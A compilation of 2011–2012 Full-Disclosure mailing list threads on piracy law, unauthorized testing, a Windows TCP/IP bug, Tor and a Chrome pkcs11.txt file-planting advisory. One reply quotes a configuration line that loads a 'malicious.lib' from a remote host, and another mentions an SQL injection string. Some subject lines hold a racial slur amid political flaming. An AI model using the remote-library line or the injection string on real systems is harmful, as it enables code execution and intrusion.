Sent: Friday, January 27, 2012 4:06 PM
To: Michael Schmidt
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] when did piracy/theft become expression of freedom

> On Fri, 27 Jan 2012 18:06:28 GMT, Michael Schmidt said:
>> You want to be very careful with that line of thought. You are taking the creator, the rightful owner's, profits, which they are entitled to if it is a product they created to be sold.
>
> You might want to go read "Courtney Love Does The Math", and then ask yourself the following:
>
> 1) You can make a case that if you copy an album instead of buying it, you're depriving somebody of profits. But what if it's an album that you would *not* have bought at full price anyhow? Or one that you bought used (see "first sale" principle)?

These arguments do more harm than good. You can't base property law on what people may not have done (of course there are "not paid your taxes" etc. - let's not get tied down with that). I'm actually surprised you made that comment. I have a product that I own the rights to. If you don't feel like paying full price, then don't buy it. You go down the street and buy a similar product for less money. That way I don't make money, and my competitor has. If this happens enough, I go out of business as an effect of how the market works. But if you were not going to pay full price, that doesn't give you any right to steal it. That is simply absurd.

Now, many in the music industry have openly stated (I've heard anyway) that internet piracy is good for business. People hear music they wouldn't have heard, and buy the album. I've done this myself, and I agree with it. But whether or not the behavior ends up benefiting the industry is irrelevant; I've still broken the law. That's where it should end, but it doesn't. Sharing music not purchased is already illegal. The companies already have legal remedies available. Unfortunately, the industry lobbyists have convinced lawmakers that the action already being illegal isn't enough - they now want the legislative body to ENFORCE the law for them by giving execution rights to the plaintiff. That is freaking nuts. What should happen is that those who do not innovate in music distribution and rights management pay to see the legal process through. Then we're back to the first example where they would end up spending too much money on legal fees and go out of business, where the guys who figure out a cool DRM scheme for sampling, sharing, etc. end up making money, and the market takes care of its own. It's far easier and cheaper to get inept and ignorant legislators to extend judgment into enforcement with new laws.

> 2) Who gets those profits, the artist, the label, or the RIAA? Are you stealing profits from the artist, or are you stealing them from somebody else who was attempting to steal them from the artist?

The fun begins when the record companies start sniping each other. Remember when The Verve got their pants sued off by the Rolling Stones' copyright holder for "Bittersweet Symphony"? It was a clean cut case of copyright infringement. What if SOPA or the next round of it does pass - will ABKCO Records legally be able to get Hut Records' entire web site shut down?

The main point here is that legal remedy for property rights already exists, and the holders of those rights should be required to exercise due process just like everyone else.

t
Re: [Full-disclosure] Rate Stratfor's Incident Response
+1

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of BMF
Sent: Thursday, January 12, 2012 5:30 PM
To: noloa...@gmail.com
Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu; Benjamin Kreuter
Subject: Re: [Full-disclosure] Rate Stratfor's Incident Response

On Thu, Jan 12, 2012 at 4:17 PM, Jeffrey Walton noloa...@gmail.com wrote:
> Is it a house, or is it a public store like Walmart or Home Depot?

And thus begins the inexorable failure of the "computer security is like physical security" analogy...

BMF
Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability Super vulnerability-lab hack
> i am not member of ariko-security / but it's not possible what you have written it's primitive slander.

FYI, you can't write slander. One speaks slander, one writes libel.

t
Re: [Full-disclosure] prosec
No workie.

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of white powder
Sent: Tuesday, December 06, 2011 3:10 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] prosec

http://130.89.241.130/~tjibbe/pics/karma-sometimes-assholes-get-what-they-deserve.jpg

u had it comin, kcope
AB u will be next
welcome to the age of the whitehat
Re: [Full-disclosure] Client aproach
You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole "' or 1=1" thing. So your approach to the client is all he would need to contact authorities if he so chose. Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it.

Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes
Sent: Wednesday, November 30, 2011 2:56 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Client aproach

Hi List,

I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities?

Thanks in advance,
Miguel Lopes
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
> You mad bro?

If by "mad" you mean "crazy", well, you're not the only one asking that question these days :)

If by "mad" you mean "angry", then I'd have to say yes. Well, angry is too strong a term - I would say frustrated. Information Security is supposed to be about just that - but we've stopped talking about that. We talk about information *insecurity*. What frustrates me is that everyone thinks there is some value to pointing out how bad everyone else's mistakes are, yet it doesn't seem like anyone is actually suggesting ways of fixing things.

I could go on, but I think I said it best here: http://syngress.com/phishwrap/july-2011-phishwrap/security-theater/

t
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Yeah, I gotta say, I'm going to use it at some point ;)

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mario Vilas
Sent: Friday, November 11, 2011 9:02 AM
To: Ryan Dewhurst
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

I liked the "heavy breather in the perv closet" bit.

On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote:
> I think Jon just said what everyone else was thinking, he said what I was thinking at least.
>
> On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote:
>> On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote:
>>> About the PPS, i think that's a very bad summary of the exploit, 49days to send a packet, my butt. There are many people assuming wrong things, when it can be done with seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in real world botnet, yes then, with tcpip patchers, like so many ppl i know myself, even use (tcpipz)patcher ) , which rocks... and it is ONLY one which actually works, when you maybe modify the src so the sys file, is dropped from within a .cpp file, well that's up to you but that's better way to make it work, this will open sockets/threads, as i could, easily prove with one exe, but, the goal is, to trigger the vuln then exploit it, less than 49days :P , so , i guess if this exploit, in real form, gathered 2 million hosts over 3 nights.. i guessing that the exploit, could possibly be triggered with ONE properly setup packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another..
>>
>> I'd really like to see you actually explain this bug with code. Either with a poc or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD.

--
There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
So, I've looked about on the web to see what software of any consequence you have written, but I can't find any. Can you point me to anything that illustrates that you know how to develop wide scale software applications and execute an SDL plan, or do you just like to sit back and bitch about everyone else without actually doing anything? I'm serious - I'd really like to know. Over all these years, all I've ever seen from you is talk about how stupid everyone else is, but I've never once actually seen you do anything constructive.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski
Sent: Thursday, November 10, 2011 8:48 AM
To: xD 0x41
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

On Thu, Nov 10, 2011 at 08:46:44AM +1100, xD 0x41 wrote:
> You could just google for IRC packs of win2k src ;) I know i have a copy of it somewhere... actually tho, would not be helpful tho, as it does not affect win2k.. so i guess there would be some code there but not the code you want. @george and, ideally if 'years' ago existed for this exploit but, it does only affect v6 and up , this is tested so xp/2k/2k3 not affected... still, i know people are using other ways anyhow , and that's just how botting is... one way dies, one takes its place :s i guess we wait for the rls of this.. maybe!

as in real life, real bugs die (the imaginary case is not clear to me).

i suppose trustworthy computing doesn't mean not many bugs still alive.

--
j
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Fake :)

From: Sergito [mailto:sergito.li...@gmail.com]
Sent: Thursday, November 10, 2011 11:50 AM
To: Thor (Hammer of God)
Cc: Georgi Guninski; xD 0x41; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

PoC ?

http://www.youtube.com/watch?v=4aBE6o0oDlo

[]'s
Sergito

2011/11/10 Thor (Hammer of God) t...@hammerofgod.com
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
*Any* assumptions that presuppose security based on social affiliation need to be reconsidered.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu
Sent: Monday, October 24, 2011 9:32 AM
To: Travis Biehn
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers

On Mon, 24 Oct 2011 11:53:02 EDT, Travis Biehn said:
> So they put up a fake network, 'hacked' most of the nodes, and with complete control of their dummy network they were able to figure out traffic movement? This is news why?

It's not news - it's *long* been known that Tor would be breakable if somebody pwned a sufficient percentage of the nodes. It's been regarded as a mostly theoretical attack, because the sort of people that run Tor have up to now been the paranoid type that tend to secure their systems better.

The only part of *news* in it was this: "Researchers showed that one third of the nodes are vulnerable". So maybe the "people who run Tor are more paranoid" assumption is flawed and needs to be reconsidered.
Re: [Full-disclosure] Google Chrome pkcs11.txt File Planting
For what it's worth, I found this article to be far more matter of fact in regard to the general concept, the existing (default) conditions in play, and the conditions which need to be in place (or manipulated) in order for this to be exploited than some of the other material your company has presented in the past. Noting it may or may not be a vulnerability shows some research maturity and business intelligence on your part, and was actually refreshing. When researchers spend too much time painting dire pictures of impact based on (what is typically) non-standard or exaggerated exposure scenarios, the actual message in the research is lost. In this case, developers can very easily see how including features that support functions such as library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib is a really bad idea.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of ACROS Security Lists
Sent: Friday, October 21, 2011 2:07 AM
To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk; c...@cert.org; si-c...@arnes.si
Subject: [Full-disclosure] Google Chrome pkcs11.txt File Planting

A month ago our company notified Google about a peculiar behavior of Chrome browser that can be exploited for execution of remote code outside Chrome sandbox under specific conditions. Our new blog post describes it all.

http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html
or
http://bit.ly/olK1P9

Enjoy the reading!

Mitja Kolsek
CEO & CTO

ACROS, d.o.o.
Makedonska ulica 113
SI - 2000 Maribor, Slovenia
tel: +386 2 3000 280
fax: +386 2 3000 282
web: http://www.acrossecurity.com
blg: http://blog.acrossecurity.com

ACROS Security: Finding Your Digital Vulnerabilities Before Others Do

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
I don't think I have any mental deficiency, but I've certainly done things that almost got me a Darwin Award. I think momentary lack of reason better describes it.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Paul Schmehl
Sent: Monday, October 17, 2011 8:32 AM
To: valdis.kletni...@vt.edu; noloa...@gmail.com
Cc: full-disclosure
Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

--On October 17, 2011 9:03:21 AM -0400 valdis.kletni...@vt.edu wrote:

> On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said:
>> Does the Darwin Awards have a category for dumb computer related decisions?
>
> Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect -- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made.

OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency?

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
***
"It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson
"There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
He already talks about how he's already thought about that in a prior article: http://gawker.com/5850025/right+wing-rabble+rouser-leaks-thousands-of-occupy-wall-street-emails

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jeffrey Walton
Sent: Sunday, October 16, 2011 4:05 PM
To: Ivan .
Cc: full-disclosure
Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote:
> http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall-street-to-the-fbi-and-nypd

Thomas Ryan is definitely not the brightest fellow in computer security:

"We have been heavily monitoring Occupy Wall Street, and Anonymous."

Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address.
Haven't we made it to the point where top posting is OK? I mean, it works from a Ped Xing standpoint, why not here? It is REALLY that bad?

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu
Sent: Friday, October 14, 2011 7:41 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address.

If you guys are going to continue your little flame war, would you at *least* trim the non-relevant parts of the mail you're replying to? And at least be *creative* in your flaming, m'kay?

Oh, and quit top-posting.

(And the person who wanted more pink bits - if you can't find free pr0n on the internet on your own, you're obviously *waaay* too young to be posting on this list)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
>> Colorado empties popular lake to pay its water bill
>> http://www.telegraph.co.uk/news/worldnews/northamerica/usa/8816656/Colorado-empties-popular-lake-to-pay-its-water-bill.html
>> and so on. Your tax $$$ go to bailouts
>
> Are these links true? Things might be worse than i suspected (no matter what vagina-americans bitch about the crisis).

Do you really care if they are true or not? Reality has not stopped you from sharing your racist, elitist, know-it-all opinions before. Why start now?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
I saw this on FB and thought I would pass it along:

http://99percentexif.tumblr.com/

It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post.

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras
Sent: Wednesday, October 12, 2011 12:45 AM
To: noloa...@gmail.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules

Regarding who's doing the most damage to US economy, I'll just say I won't comment.

I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites.

On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.com wrote:
> On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.com wrote:
>> Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if!
>
> It's not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US).
>
> One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1].
>
> Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations. Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10.
>
> Jeff
>
> [1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html
>
> On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote:
>> On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:
>>> Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward.
>>
>> How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too.
>>
>> The last time I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'.
>>
>> Jeff
>>
>> [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm
>
> [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check.

And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
No, it goes to show you how much most of the people bitching about all of this are full of shit, as per the oldie but goodie "Holiday in Cambodia" by the Dead Kennedys. The people who REALLY need help are not the ones sitting around all day posting shite on the internet.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of David Alanis
Sent: Wednesday, October 12, 2011 10:21 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules

Quoting Thor (Hammer of God) t...@hammerofgod.com:

> I saw this on FB and thought I would pass it along:
>
> http://99percentexif.tumblr.com/
>
> It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post.
>
> t

To me this goes to show right wing absurdity and the length they go to feed propaganda to the Fox News sheeople/believers. What is the logic of the Tumblr page anyway!? If you protest against rich filthy thieves you mustn't own a semi decent camera? It's not a right but a privilege to own a nice camera, now.

This message was sent using IMP, the Internet Messaging Program.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Well, you said "nor do I care" so I too am confused. However, since you did ask, there is an important aspect to your retort that you seem ok with dancing over, and that is the fact that taxing millionaires and billionaires would be *additional* taxes. Mine won't go down, and in fact, will probably go up. And I guarantee, without question and as definitely as the sun will rise tomorrow, when whatever x population is taxed more, and whatever resolution these people think will come from all of this noise, that they will CONTINUE to bitch and moan when other people have more than they do.

The premise of "I am the 99%" or your use of "average" is specious. Average what? Income? No, that can't be it. Education? No, that's clearly not it. Average tax payer? Certainly not. Average person bitching about how they don't have what they want and think it should magically be given to them? Well, that's more like it, isn't it? The entire movement is a waste of time, and the "let them eat cake-ers" will find that out, as they always do, when they become the ones that have to start baking.

The reason I posted the link is because it's freaking FUNNY to call out the ME-TOO'S! Now if you'll excuse me, I must get back to my job so that I can try to afford the taxes taken out.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of David Alanis
Sent: Wednesday, October 12, 2011 12:19 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules

Quoting Thor (Hammer of God) t...@hammerofgod.com:

> No, it goes to show you how much most of the people bitching about all of this are full of shit, as per the oldie but goodie "Holiday in Cambodia" by the Dead Kennedys. The people who REALLY need help are not the ones sitting around all day posting shite on the internet.

I don't know where you're getting at or what political stance you take nor do I care. If you don't think the people who are protesting against the greed of wall street are average Americans, then you need help.

Tell us then, since you cared enough to post a link trying to discredit the anti-wall-street movement based on exifs. Who are the people who need the help? Corporations? Cause I've heard opposing arguments by *average* Americans that corporations are people. Last time I checked, Obama's Job Act gives even more tax breaks to companies and extends unemployment benefits to *Americans* without jobs by taxing millionaires and billionaires.

You have me confused.

> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of David Alanis
> Sent: Wednesday, October 12, 2011 10:21 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
>
> Quoting Thor (Hammer of God) t...@hammerofgod.com:
>
>> I saw this on FB and thought I would pass it along:
>>
>> http://99percentexif.tumblr.com/
>>
>> It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post.
>>
>> t
>
> To me this goes to show right wing absurdity and the length they go to feed propaganda to the Fox News sheeople/believers. What is the logic of the Tumblr page anyway!? If you protest against rich filthy thieves you mustn't own a semi decent camera? It's not a right but a privilege to own a nice camera, now.
>
> This message was sent using IMP, the Internet Messaging Program.

This message was sent using IMP, the Internet Messaging Program.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Or people who think they are better because of the color of their skin.

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Darren Martyn
Sent: Monday, October 10, 2011 3:29 AM
To: Christian Sciberras
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules

We all are guilty, that is true. I can admit to that. Though what I intensely dislike are those who think they are better than us - because they are more successful at being greedy pigs.

On Mon, Oct 10, 2011 at 9:54 AM, Christian Sciberras uuf6...@gmail.com wrote:
> He who believes the 99% are not guilty of greed is a downright fool.
> The 1%? I don't care. Honestly, I don't.
>
> Fun quote (from the 99% crowd): "Why does the 1% deserve a Ferrari and I don't?!"
>
> On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:
>> The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now?
>>
>> On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.com wrote:
>>> On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.com wrote:
>>>> "American people understand that not everybody's been following the rules," he said. "These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded."
>>>
>>> From the article:
>>> : President Obama on Thursday called the Occupy Wall
>>> : Street protests a reflection of a broad-based frustration
>>> : about how our financial system works and pledged to
>>> : continue fighting to protect American consumers.
>>>
>>> I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): "My administration is the only thing saving you from the pitchforks of the American people."
>>>
>>> It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets.
>>>
>>> Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims.

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras
Sent: Monday, October 10, 2011 7:05 AM
To: Michael T
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in.

Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it?

I'm just curious to these questions. It's strange to hear someone saying "we basically have no idea what's going on".

On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote:
> It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'.
>
> That likely means they have:
> 1. NO logging
> 2. NO anti-virus
> 3. NO hardening
>
> The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop.
>
> Immune to viruses... What a crock of shit.
>
> My bet is that it's coming from the planes.
>
> Mike
>
> On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote:
>> http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/
>>
>> This is news to me.
>>
>> Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from?
>>
>> It sounds fishy if you ask me.
>>
>> Chris.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Just look at the replies on FD as well – people saying “most likely means A,B,C” and “probably this or that” where they have absolutely no basis for making such statements. People “want” this to be the case, and are more than willing to simply accept any such claim as gospel. I would have to say that the article did precisely what it was designed to do: generate hits to drive membership and ads.

Oh, and I was wrong – the source wasn’t “someone close” it was “a source familiar with the network infection” which could be you or me at this point, or the copy repair-person. I’m familiar with it. So are you.

These “articles” are attractive because the author can say what they want based on interpretation of conversations with the “unknown and never-to-be-revealed” contact. If people can’t back up what they are saying, or when the entire validity of an article is based on the word of “someone speaking on terms of anonymity” then there’s really not much value in it.

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Monday, October 10, 2011 11:23 AM
To: Thor (Hammer of God)
Cc: Michael T; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

Since it very much discredits and puts the AA to shame, isn't it quite plausible that some department's lawyers fall over this guy's claims?

Maybe the article has been written specifically for people to draw the wrong conclusion - happens too often - but still...

On Mon, Oct 10, 2011 at 7:36 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
> Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims.
>
> t
>
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras
> Sent: Monday, October 10, 2011 7:05 AM
> To: Michael T
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
>
> I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in.
>
> Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it?
>
> I'm just curious to these questions. It's strange to hear someone saying "we basically have no idea what's going on".
>
> On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote:
>> It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'.
>>
>> That likely means they have:
>> 1. NO logging
>> 2. NO anti-virus
>> 3. NO hardening
>>
>> The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop.
>>
>> Immune to viruses... What a crock of shit.
>>
>> My bet is that it's coming from the planes.
>>
>> Mike
>>
>> On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote:
>>> http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/
>>>
>>> This is news to me.
>>>
>>> Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from?
>>>
>>> It sounds fishy if you ask me.
>>>
>>> Chris.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Per request.

From: andrew.wallace [mailto:andrew.wall...@rocketmail.com]
Sent: Monday, October 10, 2011 11:50 AM
